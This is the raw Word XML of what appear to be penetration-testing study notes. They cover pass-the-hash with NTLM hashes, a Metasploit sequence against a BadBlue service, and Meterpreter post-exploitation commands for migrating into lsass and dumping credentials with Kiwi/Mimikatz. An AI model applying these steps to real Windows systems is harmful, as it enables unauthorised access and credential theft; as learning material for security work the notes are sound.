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BECD" w14:textId="77777777" w:rsidR="00D41408" w:rsidRDefault="00D41408">
      <w:r>
        <w:t xml:space="preserve">We Collected NTLM HASHES: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D07846" w14:textId="655D9B0A" w:rsidR="00853ABF" w:rsidRDefault="00D41408">
      <w:r>
        <w:t>pass the hash attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67651C50" w14:textId="77777777" w:rsidR="00D41408" w:rsidRPr="00D41408" w:rsidRDefault="00D41408" w:rsidP="00D41408">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41408">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pass the hash attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276D8AB5" w14:textId="21B21F4B" w:rsidR="00D41408" w:rsidRDefault="00D41408">
      <w:r>
        <w:t xml:space="preserve">involves capturing or harvesting the NTLMS hashes or </w:t>
      </w:r>
      <w:r w:rsidR="001A5C38">
        <w:t>cleartext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> passwords and utilize them to authenticate to the target legitimately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF1670" w14:textId="47F3E204" w:rsidR="00D41408" w:rsidRDefault="001A5C38">
      <w:r>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175DB3B0" w14:textId="75D64404" w:rsidR="001A5C38" w:rsidRDefault="001A5C38">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64280431" w14:textId="1679B54C" w:rsidR="001A5C38" w:rsidRDefault="007F3CFA">
      <w:r>
        <w:t xml:space="preserve">If the vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00942CAA">
        <w:t>patched,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then if you have the hash of admin you have</w:t>
      </w:r>
      <w:r w:rsidR="00942CAA">
        <w:t xml:space="preserve"> use it to access target</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617A85A" w14:textId="77777777" w:rsidR="007F3CFA" w:rsidRDefault="007F3CFA"/>
    <w:p w14:paraId="2BE752F2" w14:textId="77777777" w:rsidR="00942CAA" w:rsidRDefault="00942CAA"/>
    <w:p w14:paraId="07E31BC3" w14:textId="4B9E0AC6" w:rsidR="00942CAA" w:rsidRPr="00942CAA" w:rsidRDefault="00942CAA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00942CAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00942CAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EC992A" w14:textId="4A729D17" w:rsidR="00942CAA" w:rsidRDefault="00942CAA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4B682706" w14:textId="7BAA80EE" w:rsidR="00942CAA" w:rsidRDefault="00942CAA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B832F22" w14:textId="40E26F52" w:rsidR="00942CAA" w:rsidRDefault="00942CAA">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C3DB24A" w14:textId="6D09610A" w:rsidR="00942CAA" w:rsidRDefault="000608A0">
      <w:r>
        <w:t>Use (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4891E3" w14:textId="4CF8FCBB" w:rsidR="000608A0" w:rsidRDefault="000608A0">
      <w:r>
        <w:t>Set the values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5261DD2D" w14:textId="24C5BCD2" w:rsidR="000608A0" w:rsidRDefault="000608A0">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D62D41E" w14:textId="77777777" w:rsidR="000608A0" w:rsidRDefault="000608A0"/>
    <w:p w14:paraId="3BB02908" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7022F6FD" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve">It’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter command</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> (not the Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000608A0">
        <w:t>pgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000608A0">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086A3502" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve">It means </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>process grep</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F041A86" w14:textId="1B4008D7" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve">It searches running processes on the target system by name (pattern matching) and returns the </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process ID (PID)</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7A689D" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="720C1218" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve">Refers to the </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local Security Authority Subsystem Service</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> (lsass.exe) in Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F125C" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve">lsass.exe handles </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authentication, logon sessions, password hashes, Kerberos tickets, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47104623" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This process is a </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>prime target</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> during post-exploitation because dumping it can reveal </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD1DDFC" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> migrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273DEBEF" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter command</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> that tells your current session to </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>move into another process</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90EC25" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve">This is often done to gain </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stability, stealth, or higher privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469F9AC3" w14:textId="77777777" w:rsidR="000608A0" w:rsidRDefault="000608A0">
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CC581F8" w14:textId="33866A0F" w:rsidR="000608A0" w:rsidRDefault="000608A0">
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve">tells you </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>which user account your Meterpreter session is currently running as</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7FEB9D" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> load kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657EBDB3" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve">This command </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>loads the Kiwi extension</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> inside Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4069CC" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve">Kiwi is a </w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">built-in port of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> (a famous credential-dumping tool).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242794EC" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:t>Once loaded, it gives you direct Meterpreter commands to interact with Windows authentication data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D88E519" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:r w:rsidRPr="000608A0">
        <w:pict w14:anchorId="62993B2C">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C9AEE0" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> What you can do after load kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F468317" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:r w:rsidRPr="000608A0">
        <w:t>Some useful commands include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2000A4" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000608A0">
        <w:t>creds_all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> → Dump all available creds (hashes, tickets, plaintext if possible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C57403" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lsa_dump_sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> → Dump SAM database credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700682A" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000608A0">
        <w:t>lsa_dump_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> → Extract cached domain credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A8DB43" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000608A0">
        <w:t>kerberos_ticket_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> → List Kerberos tickets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F08888" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000608A0">
        <w:t>kerberos_ticket_use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> → Pass-the-ticket (reuse Kerberos ticket for lateral movement).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB2B886" w14:textId="77777777" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0" w:rsidP="000608A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000608A0">
        <w:t>pwdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000608A0">
        <w:t xml:space="preserve"> → Dump local account password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390647E3" w14:textId="77777777" w:rsidR="00643C0A" w:rsidRPr="00643C0A" w:rsidRDefault="00643C0A" w:rsidP="00643C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643C0A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00643C0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643C0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4100A3FC" w14:textId="77777777" w:rsidR="00643C0A" w:rsidRPr="00643C0A" w:rsidRDefault="00643C0A" w:rsidP="00643C0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00643C0A">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00643C0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>post-exploitation / lateral movement tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00643C0A">
        <w:t xml:space="preserve"> (often called the </w:t>
      </w:r>
      <w:r w:rsidRPr="00643C0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Swiss Army knife for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643C0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643C0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows networks</w:t>
      </w:r>
      <w:r w:rsidRPr="00643C0A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509FD030" w14:textId="77777777" w:rsidR="00643C0A" w:rsidRPr="00643C0A" w:rsidRDefault="00643C0A" w:rsidP="00643C0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00643C0A">
        <w:t xml:space="preserve">It can enumerate, brute-force, and execute commands over SMB, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643C0A">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643C0A">
        <w:t>, RDP, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5F7406" w14:textId="77777777" w:rsidR="009C1516" w:rsidRPr="009C1516" w:rsidRDefault="009C1516" w:rsidP="009C1516">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1516">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C1516">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C1516">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F2E97E" w14:textId="77777777" w:rsidR="009C1516" w:rsidRPr="009C1516" w:rsidRDefault="009C1516" w:rsidP="009C1516">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C1516">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C1516">
        <w:t xml:space="preserve"> is a Windows tool from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C1516">
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C1516">
        <w:t xml:space="preserve"> (by Microsoft).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F43C0B" w14:textId="77777777" w:rsidR="009C1516" w:rsidRPr="009C1516" w:rsidRDefault="009C1516" w:rsidP="009C1516">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1516">
        <w:t xml:space="preserve">It allows administrators to </w:t>
      </w:r>
      <w:r w:rsidRPr="009C1516">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remotely execute commands</w:t>
      </w:r>
      <w:r w:rsidRPr="009C1516">
        <w:t xml:space="preserve"> on Windows machines over SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B077D2" w14:textId="77777777" w:rsidR="009C1516" w:rsidRPr="009C1516" w:rsidRDefault="009C1516" w:rsidP="009C1516">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1516">
        <w:t xml:space="preserve">Attackers abuse this technique to execute malware or payloads remotely once they have </w:t>
      </w:r>
      <w:r w:rsidRPr="009C1516">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>valid credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="009C1516">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691436BD" w14:textId="77777777" w:rsidR="000608A0" w:rsidRDefault="000608A0"/>
    <w:p w14:paraId="2D0DED8B" w14:textId="32EF489E" w:rsidR="000608A0" w:rsidRPr="000608A0" w:rsidRDefault="000608A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000608A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter session:</w:t>
      </w:r>
    </w:p>
